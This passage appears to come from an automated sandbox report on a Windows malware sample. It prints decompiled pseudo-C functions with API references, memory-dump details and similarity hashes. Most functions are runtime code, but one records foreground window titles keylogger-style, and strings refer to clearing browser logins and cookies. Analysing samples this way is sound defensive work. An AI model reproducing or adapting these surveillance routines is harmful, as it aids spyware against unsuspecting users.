                                                                                                0x0040a579
                                                                                                0x0040a57d
                                                                                                0x0040a57f
                                                                                                0x0040a585
                                                                                                0x0040a585
                                                                                                0x0040a589
                                                                                                0x0040a589
                                                                                                0x0040a589
                                                                                                0x0040a589
                                                                                                0x0040a58b
                                                                                                0x0040a58d
                                                                                                0x0040a592
                                                                                                0x0040a592
                                                                                                0x0040a594
                                                                                                0x0040a596
                                                                                                0x0040a59d
                                                                                                0x0040a59d
                                                                                                0x0040a5a3
                                                                                                0x0040a5a5
                                                                                                0x0040a5ac
                                                                                                0x0040a5ac
                                                                                                0x0040a5b4
                                                                                                0x0040a5b6
                                                                                                0x0040a5bd
                                                                                                0x0040a5bd
                                                                                                0x0040a5c1
                                                                                                0x0040a5c5
                                                                                                0x0040a5c7
                                                                                                0x0040a5ce
                                                                                                0x0040a5d0
                                                                                                0x0040a5d0
                                                                                                0x0040a5d6
                                                                                                0x0040a5f0
                                                                                                0x0040a5f5
                                                                                                0x0040a5fb
                                                                                                0x0040a5ff
                                                                                                0x0040a603
                                                                                                0x0040a5dc
                                                                                                0x0040a5dc
                                                                                                0x0040a5e2
                                                                                                0x00000000
                                                                                                0x0040a5e8
                                                                                                0x0040a5e8
                                                                                                0x0040a5ee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a5ee
                                                                                                0x0040a5e2
                                                                                                0x0040a609
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a60b
                                                                                                0x0040a623
                                                                                                0x0040a623
                                                                                                0x0040a62b
                                                                                                0x0040a635
                                                                                                0x0040a63a
                                                                                                0x0040a646
                                                                                                0x0040a64b
                                                                                                0x0040a655
                                                                                                0x0040a65a
                                                                                                0x0040a669
                                                                                                0x0040a66e
                                                                                                0x0040a678
                                                                                                0x0040a684
                                                                                                0x0040a699
                                                                                                0x0040a69f
                                                                                                0x0040a6a0
                                                                                                0x0040a6ad

                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040A641
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040A630
                                                                                                • HF, xrefs: 0040A673
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$HF
                                                                                                • API String ID: 3472027048-3237332583
                                                                                                • Opcode ID: 21acf838c3ef3d37e89a7cb7b37da1cb45ed835ec19164bd4333aee075db73ed
                                                                                                • Instruction ID: 1159f6137ea5fcd9a7ec24e65668836fe1ed30cbca5fe25e035a3b6fd4e0bff1
                                                                                                • Opcode Fuzzy Hash: 21acf838c3ef3d37e89a7cb7b37da1cb45ed835ec19164bd4333aee075db73ed
                                                                                                • Instruction Fuzzy Hash: D031A00464C38169DA1167B558167AB7BD11A93758F0C84BFB8C43B3C3E9BA4818D36F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00408A87, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 82sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E00408A87() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t34);
				_t59 = Sleep;
				_t61 = _t35;
				while(1) {
					E00432D80(_t59,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = E00401F87(E00401E3B(0x46e3a4, _t56, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E00404260(_t34, _t66, _t15);
						_t17 = E004184AF( &_v2012, _t56);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t56 = E004043E6(_t34,  &_v2056, L"\r\n[ ", __eflags, E00404260(_t34,  &_v2028,  &_v2004));
					E00401EEC(_t61 + 4, _t20, _t61, E00403098(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
					E00401EE2();
					E00401EE2();
					E00401EE2();
					_t67 = _t65 - 0x18;
					E004074B3(_t34, _t67, _t56, __eflags, _t61 + 0x60);
					E00408778(_t61);
					while(1) {
						_t30 = E00401F87(E00401E3B(0x46e3a4, _t56, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E00404260(_t34, _t68, _t30);
						_t32 = E004184AF(0, _t56);
						_t64 = _t68 + 0x18;
						__eflags = _t32;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E004095C0(_t34, _t61);
				}
			}


























                                                                                                0x00408a8a
                                                                                                0x00408a8a
                                                                                                0x00408a8d
                                                                                                0x00408a93
                                                                                                0x00408a96
                                                                                                0x00408a9c
                                                                                                0x00408a9e
                                                                                                0x00408aaa
                                                                                                0x00408aaf
                                                                                                0x00408ab2
                                                                                                0x00408ac0
                                                                                                0x00408ac5
                                                                                                0x00408acb
                                                                                                0x00408ad4
                                                                                                0x00408ad9
                                                                                                0x00408adc
                                                                                                0x00408ade
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00408ae5
                                                                                                0x00408ae5
                                                                                                0x00408b0c
                                                                                                0x00408b1c
                                                                                                0x00408b25
                                                                                                0x00408b2e
                                                                                                0x00408b37
                                                                                                0x00408b3c
                                                                                                0x00408b45
                                                                                                0x00408b4c
                                                                                                0x00408b51
                                                                                                0x00408b5f
                                                                                                0x00408b64
                                                                                                0x00408b6a
                                                                                                0x00408b71
                                                                                                0x00408b76
                                                                                                0x00408b79
                                                                                                0x00408b7b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00408b7f
                                                                                                0x00408b7f
                                                                                                0x00408b85
                                                                                                0x00408b85

                                                                                                APIs
                                                                                                  • Part of subcall function 004184AF: GetForegroundWindow.USER32(73B76490,?), ref: 004184BF
                                                                                                  • Part of subcall function 004184AF: GetWindowTextLengthW.USER32(00000000), ref: 004184C8
                                                                                                  • Part of subcall function 004184AF: GetWindowTextW.USER32 ref: 004184F2
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00408AE5
                                                                                                • Sleep.KERNEL32(00000064), ref: 00408B7F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]$hpg
                                                                                                • API String ID: 3309952895-2979498528
                                                                                                • Opcode ID: 1aa08749d6a9c356dc4dce74285a677d20935d72892b46fd394d0f0ebc376bd1
                                                                                                • Instruction ID: 6f51f7d36ff40c6957033223ff1922c1c80d499359e603aae0f0b374eaa9aec7
                                                                                                • Opcode Fuzzy Hash: 1aa08749d6a9c356dc4dce74285a677d20935d72892b46fd394d0f0ebc376bd1
                                                                                                • Instruction Fuzzy Hash: C221AC7160420457C604F7B6DD57A6E32A89F91308F50093FFA82772D2FE7CAA06869F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00442FEC, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E00442FEC(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46c1d0; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E00440628(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00443565(_t13, _t16, __eflags,  *0x46c1d0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00442DDA(_t13, _t15, 0x46d654);
							E004414D5(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E004414D5();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0044350F(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                                                                                                0x00442fec
                                                                                                0x00442ff7
                                                                                                0x00442ff9
                                                                                                0x00442ffb
                                                                                                0x00443000
                                                                                                0x00443003
                                                                                                0x00443011
                                                                                                0x0044301d
                                                                                                0x00443020
                                                                                                0x00443023
                                                                                                0x00443035
                                                                                                0x0044303a
                                                                                                0x0044303c
                                                                                                0x00443047
                                                                                                0x0044304d
                                                                                                0x00443055
                                                                                                0x00443057
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044303e
                                                                                                0x0044303e
                                                                                                0x00000000
                                                                                                0x0044303e
                                                                                                0x00443025
                                                                                                0x00443025
                                                                                                0x00443026
                                                                                                0x00443026
                                                                                                0x00443059
                                                                                                0x0044305a
                                                                                                0x0044305a
                                                                                                0x00443005
                                                                                                0x0044300b
                                                                                                0x0044300f
                                                                                                0x00443062
                                                                                                0x00443063
                                                                                                0x00443069
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044300f
                                                                                                0x00443070

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00438937,00440CAF,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00442FF1
                                                                                                • _free.LIBCMT ref: 00443026
                                                                                                • _free.LIBCMT ref: 0044304D
                                                                                                • SetLastError.KERNEL32(00000000), ref: 0044305A
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00443063
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: bcc27f08dd9ce5c941f398712e0becde7749f269bd067e3c5ab603e4cf92cf0e
                                                                                                • Instruction ID: 5b834de4c46fb63ac1e90027ff2ada438182af798af3bab93b78e27533bb863e
                                                                                                • Opcode Fuzzy Hash: bcc27f08dd9ce5c941f398712e0becde7749f269bd067e3c5ab603e4cf92cf0e
                                                                                                • Instruction Fuzzy Hash: 9A01F93654070037B6216F2A6C85A2B222EEBD1F7BB20022BF515A6296EE7CCE41411D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00449E8C, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00449E8C(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46c178; // 0x46c170
					if(_t23 != 0) {
						E004414D5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46c17c; // 0x46d64c
					if(_t24 != 0) {
						E004414D5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46c180; // 0x46d64c
					if(_t25 != 0) {
						E004414D5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46c1a8; // 0x46c174
					if(_t26 != 0) {
						E004414D5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46c1ac; // 0x46d650
					if(_t27 != 0) {
						return E004414D5(_t6);
					}
				}
				return _t6;
			}










                                                                                                0x00449e92
                                                                                                0x00449e97
                                                                                                0x00449e9b
                                                                                                0x00449ea1
                                                                                                0x00449ea4
                                                                                                0x00449ea9
                                                                                                0x00449ead
                                                                                                0x00449eb3
                                                                                                0x00449eb6
                                                                                                0x00449ebb
                                                                                                0x00449ebf
                                                                                                0x00449ec5
                                                                                                0x00449ec8
                                                                                                0x00449ecd
                                                                                                0x00449ed1
                                                                                                0x00449ed7
                                                                                                0x00449eda
                                                                                                0x00449edf
                                                                                                0x00449ee0
                                                                                                0x00449ee3
                                                                                                0x00449ee9
                                                                                                0x00000000
                                                                                                0x00449ef1
                                                                                                0x00449ee9
                                                                                                0x00449ef4

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00449EA4
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 00449EB6
                                                                                                • _free.LIBCMT ref: 00449EC8
                                                                                                • _free.LIBCMT ref: 00449EDA
                                                                                                • _free.LIBCMT ref: 00449EEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 6c1f8a6fe69ad3b210c010f5ddf1bd246f5b6ba47237bec097538ba66248a7b4
                                                                                                • Instruction ID: 36bd744c82bd203efc321f79432b982e7347cafb28f25619c4515b635df10c4e
                                                                                                • Opcode Fuzzy Hash: 6c1f8a6fe69ad3b210c010f5ddf1bd246f5b6ba47237bec097538ba66248a7b4
                                                                                                • Instruction Fuzzy Hash: DCF018325042107BFA10EF6AE4C5C6773F9AA41720764481BF044D7A52DB78FCC09A6C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043EB7D, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E0043EB7D(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46c990; // 0x66fc18
					if(_t7 != 0x46c770) {
						E004414D5(_t7);
						 *0x46c990 = 0x46c770;
					}
				}
				E004414D5( *0x46da04);
				 *0x46da04 = 0;
				E004414D5( *0x46da08);
				 *0x46da08 = 0;
				E004414D5( *0x46da34);
				 *0x46da34 = 0;
				E004414D5( *0x46da38);
				 *0x46da38 = 0;
				return 1;
			}




                                                                                                0x0043eb86
                                                                                                0x0043eb8a
                                                                                                0x0043eb8c
                                                                                                0x0043eb98
                                                                                                0x0043eb9b
                                                                                                0x0043eba1
                                                                                                0x0043eba1
                                                                                                0x0043eb98
                                                                                                0x0043ebad
                                                                                                0x0043ebba
                                                                                                0x0043ebc0
                                                                                                0x0043ebcb
                                                                                                0x0043ebd1
                                                                                                0x0043ebdc
                                                                                                0x0043ebe2
                                                                                                0x0043ebea
                                                                                                0x0043ebf3

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0043EB9B
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 0043EBAD
                                                                                                • _free.LIBCMT ref: 0043EBC0
                                                                                                • _free.LIBCMT ref: 0043EBD1
                                                                                                • _free.LIBCMT ref: 0043EBE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 8476dbb9e971029f38abb61a69617b74b9a94394b61fba38927499bfc5fc5a79
                                                                                                • Instruction ID: 2504f23887d4ca37e818cc2ef72231bb6271f2d7630936b8e706385f5ec1a0fc
                                                                                                • Opcode Fuzzy Hash: 8476dbb9e971029f38abb61a69617b74b9a94394b61fba38927499bfc5fc5a79
                                                                                                • Instruction Fuzzy Hash: ACF0D0B0D0E1609B9B02AF66AC814153771B708738705512BF45596A71FBB904819F8E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00437148, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 266COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E00437148(char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				char _v56;
				char _v64;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t85;
				signed int _t87;
				void* _t90;
				signed int _t94;
				signed int _t95;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed char _t104;
				signed int _t105;
				intOrPtr _t106;
				signed char _t114;
				signed int _t115;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				void* _t122;
				void* _t131;
				signed char _t132;
				signed int _t138;
				signed int _t139;
				signed char _t140;
				signed int _t143;
				void* _t146;
				signed int _t148;
				void* _t152;
				signed int _t153;
				void* _t154;
				intOrPtr* _t155;
				intOrPtr* _t156;
				signed int _t157;
				void* _t158;

				if(E00437442( &_a8) == 0) {
					L5:
					_t153 = 0;
					_t157 = 0;
					L6:
					_t85 = _a12;
					if(_t85 != 0) {
						 *_t85 = _a8;
					}
					return _t153;
				}
				_t87 = _a16;
				if(_t87 == 0 || _t87 >= 2 && _t87 <= 0x24) {
					_push(_t131);
					_t5 =  &_a4; // 0x437b35
					E00436267(_t131,  &_v68, _t146,  *_t5);
					_v20 = 0;
					_t157 = 0;
					_t90 = _a8;
					_v52 = _t90;
					L11:
					_t132 =  *_t90;
					_a8 = _t90 + 1;
					_v16 = _t132;
					_v5 = _t132;
					_t94 = E00437487(_t132, _t146, _t152, _t157, _t132 & 0x000000ff, 8,  &_v64);
					_t158 = _t158 + 0xc;
					__eflags = _t94;
					if(_t94 != 0) {
						_t90 = _a8;
						goto L11;
					}
					__eflags = _a20 - _t94;
					_t95 = _t94 & 0xffffff00 | _a20 != _t94;
					_v12 = _t95;
					__eflags = _t132 - 0x2d;
					if(_t132 != 0x2d) {
						__eflags = _t132 - 0x2b;
						if(_t132 != 0x2b) {
							_t154 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t95 | 0x00000002;
						L15:
						_t156 = _a8;
						_t132 =  *_t156;
						_t154 = _t156 + 1;
						_v5 = _t132;
						_v16 = _t132;
						_a8 = _t154;
						L17:
						_t138 = _a16;
						_t148 = 0x10;
						__eflags = _t138;
						if(_t138 == 0) {
							L19:
							__eflags = _t132 - 0x30 - 9;
							if(_t132 - 0x30 > 9) {
								__eflags = _t132 - 0x61 - 0x19;
								if(_t132 - 0x61 > 0x19) {
									_t101 = _t132 - 0x41;
									__eflags = _t101 - 0x19;
									if(_t101 > 0x19) {
										_t102 = _t101 | 0xffffffff;
										__eflags = _t102;
									} else {
										_t102 = _t132 + 0xffffffc9;
									}
								} else {
									_t102 = _t132 + 0xffffffa9;
								}
							} else {
								_t102 = _t132 + 0xffffffd0;
							}
							__eflags = _t102;
							if(_t102 == 0) {
								_t103 =  *_t154;
								_t155 = _t154 + 1;
								_v32 = _t103;
								_a8 = _t155;
								__eflags = _t103 - 0x78;
								if(_t103 == 0x78) {
									L35:
									__eflags = _t138;
									if(_t138 == 0) {
										_a16 = _t148;
									}
									_t104 =  *_t155;
									_t154 = _t155 + 1;
									_v5 = _t104;
									_v16 = _t104;
									_a8 = _t154;
									L34:
									_t105 = _a16;
									goto L39;
								}
								__eflags = _t103 - 0x58;
								if(_t103 == 0x58) {
									goto L35;
								}
								__eflags = _t138;
								if(_t138 == 0) {
									_a16 = 8;
								}
								E004373EE( &_a8, _v32);
								_t154 = _a8;
								goto L34;
							} else {
								__eflags = _t138;
								if(_t138 != 0) {
									L38:
									_t105 = _t138;
									L39:
									asm("cdq");
									_t139 = _t148;
									_v48 = _t105;
									_v44 = _t139;
									_t106 = E00451BE0(0xffffffff, 0xffffffff, _t105, _t139);
									_v40 = _t139;
									_t140 = _v5;
									_v36 = _t132;
									__eflags = 0;
									_v28 = _t106;
									_v32 = _t148;
									while(1) {
										__eflags = _t140 - 0x30 - 9;
										if(_t140 - 0x30 > 9) {
											__eflags = _t140 - 0x61 - 0x19;
											if(_t140 - 0x61 > 0x19) {
												__eflags = _t140 - 0x41 - 0x19;
												if(_t140 - 0x41 > 0x19) {
													_t148 = _t148 | 0xffffffff;
													__eflags = _t148;
												} else {
													_t148 = _t140 + 0xffffffc9;
												}
											} else {
												_t148 = _t140 + 0xffffffa9;
											}
										} else {
											_t148 = _t140 + 0xffffffd0;
										}
										_v24 = _t148;
										__eflags = _t148 - 0xffffffff;
										if(_t148 == 0xffffffff) {
											break;
										}
										__eflags = _t148 - _a16;
										if(_t148 >= _a16) {
											break;
										}
										_t121 = _v20;
										_t143 = _v12 | 0x00000008;
										_v12 = _t143;
										__eflags = _t157 - _v32;
										if(__eflags < 0) {
											L58:
											_t122 = E004519E0(_v48, _v44, _t121, _t157);
											_t157 = _t148;
											_v20 = _t122 + _v24;
											asm("adc esi, ebx");
											L59:
											_t140 =  *_t154;
											_t154 = _t154 + 1;
											_v16 = _t140;
											_a8 = _t154;
											continue;
										}
										if(__eflags > 0) {
											L52:
											__eflags = _t121 - _v28;
											if(_t121 != _v28) {
												L57:
												_v12 = _t143 | 0x00000004;
												goto L59;
											}
											__eflags = _t157 - _v32;
											if(_t157 != _v32) {
												goto L57;
											}
											__eflags = 0 - _v36;
											if(__eflags < 0) {
												goto L58;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t148 - _v40;
											if(_t148 <= _v40) {
												goto L58;
											}
											goto L57;
										}
										__eflags = _t121 - _v28;
										if(_t121 < _v28) {
											goto L58;
										}
										goto L52;
									}
									E004373EE( &_a8, _v16);
									_t114 = _v12;
									__eflags = _t114 & 0x00000008;
									if((_t114 & 0x00000008) != 0) {
										_t153 = _v20;
										_t115 = E004367DD(_t114, _t153, _t157);
										__eflags = _t115;
										if(_t115 == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t153 =  ~_t153;
												asm("adc esi, ebx");
												_t157 =  ~_t157;
											}
											L71:
											__eflags = _v56;
											if(_v56 != 0) {
												 *(_v68 + 0x350) =  *(_v68 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E00438932())) = 0x22;
										_t118 = _v12;
										__eflags = _t118 & 0x00000001;
										if((_t118 & 0x00000001) != 0) {
											__eflags = _t118 & 0x00000002;
											if((_t118 & 0x00000002) == 0) {
												_t119 = _t118 | 0xffffffff;
												__eflags = _t119;
												_t157 = 0x7fffffff;
											} else {
												_t119 = 0;
												_t157 = 0x80000000;
											}
											L68:
											_t153 = _t119;
											goto L71;
										}
										_t153 = _t153 | 0xffffffff;
										_t157 = _t157 | 0xffffffff;
										goto L71;
									}
									_a8 = _v52;
									_t119 = 0;
									_t157 = 0;
									goto L68;
								}
								_t105 = 0xa;
								_a16 = _t105;
								goto L39;
							}
						}
						__eflags = _t138 - _t148;
						if(_t138 != _t148) {
							goto L38;
						}
						goto L19;
					}
				} else {
					 *((intOrPtr*)(E00438932())) = 0x16;
					E00437709();
					goto L5;
				}
			}





















































                                                                                                0x0043715c
                                                                                                0x0043717f
                                                                                                0x00437181
                                                                                                0x00437183
                                                                                                0x00437185
                                                                                                0x00437185
                                                                                                0x0043718a
                                                                                                0x0043718f
                                                                                                0x0043718f
                                                                                                0x0043719a
                                                                                                0x0043719a
                                                                                                0x0043715e
                                                                                                0x00437163
                                                                                                0x0043719b
                                                                                                0x0043719c
                                                                                                0x004371a2
                                                                                                0x004371a9
                                                                                                0x004371ac
                                                                                                0x004371ae
                                                                                                0x004371b1
                                                                                                0x004371b9
                                                                                                0x004371b9
                                                                                                0x004371bc
                                                                                                0x004371c9
                                                                                                0x004371cc
                                                                                                0x004371cf
                                                                                                0x004371d4
                                                                                                0x004371d7
                                                                                                0x004371d9
                                                                                                0x004371b6
                                                                                                0x00000000
                                                                                                0x004371b6
                                                                                                0x004371db
                                                                                                0x004371de
                                                                                                0x004371e1
                                                                                                0x004371e4
                                                                                                0x004371e7
                                                                                                0x004371f1
                                                                                                0x004371f4
                                                                                                0x00437207
                                                                                                0x00000000
                                                                                                0x00437207
                                                                                                0x00000000
                                                                                                0x004371e9
                                                                                                0x004371ec
                                                                                                0x004371f6
                                                                                                0x004371f6
                                                                                                0x004371f9
                                                                                                0x004371fb
                                                                                                0x004371fc
                                                                                                0x004371ff
                                                                                                0x00437202
                                                                                                0x0043720a
                                                                                                0x0043720a
                                                                                                0x0043720f
                                                                                                0x00437210
                                                                                                0x00437212
                                                                                                0x0043721c
                                                                                                0x00437220
                                                                                                0x00437222
                                                                                                0x00437230
                                                                                                0x00437232
                                                                                                0x0043723e
                                                                                                0x00437240
                                                                                                0x00437242
                                                                                                0x0043724c
                                                                                                0x0043724c
                                                                                                0x00437244
                                                                                                0x00437247
                                                                                                0x00437247
                                                                                                0x00437234
                                                                                                0x00437237
                                                                                                0x00437237
                                                                                                0x00437224
                                                                                                0x00437227
                                                                                                0x00437227
                                                                                                0x0043724f
                                                                                                0x00437251
                                                                                                0x0043725f
                                                                                                0x00437261
                                                                                                0x00437262
                                                                                                0x00437265
                                                                                                0x00437268
                                                                                                0x0043726a
                                                                                                0x0043728e
                                                                                                0x0043728e
                                                                                                0x00437290
                                                                                                0x00437292
                                                                                                0x00437292
                                                                                                0x00437295
                                                                                                0x00437297
                                                                                                0x00437298
                                                                                                0x0043729b
                                                                                                0x0043729e
                                                                                                0x00437289
                                                                                                0x00437289
                                                                                                0x00000000
                                                                                                0x00437289
                                                                                                0x0043726c
                                                                                                0x0043726e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437270
                                                                                                0x00437272
                                                                                                0x00437274
                                                                                                0x00437274
                                                                                                0x00437281
                                                                                                0x00437286
                                                                                                0x00000000
                                                                                                0x00437253
                                                                                                0x00437253
                                                                                                0x00437255
                                                                                                0x004372a3
                                                                                                0x004372a3
                                                                                                0x004372a5
                                                                                                0x004372a5
                                                                                                0x004372a6
                                                                                                0x004372a8
                                                                                                0x004372b1
                                                                                                0x004372b4
                                                                                                0x004372b9
                                                                                                0x004372bc
                                                                                                0x004372bf
                                                                                                0x004372c2
                                                                                                0x004372c4
                                                                                                0x004372c7
                                                                                                0x004372ca
                                                                                                0x004372ce
                                                                                                0x004372d0
                                                                                                0x004372de
                                                                                                0x004372e0
                                                                                                0x004372ee
                                                                                                0x004372f0
                                                                                                0x004372fa
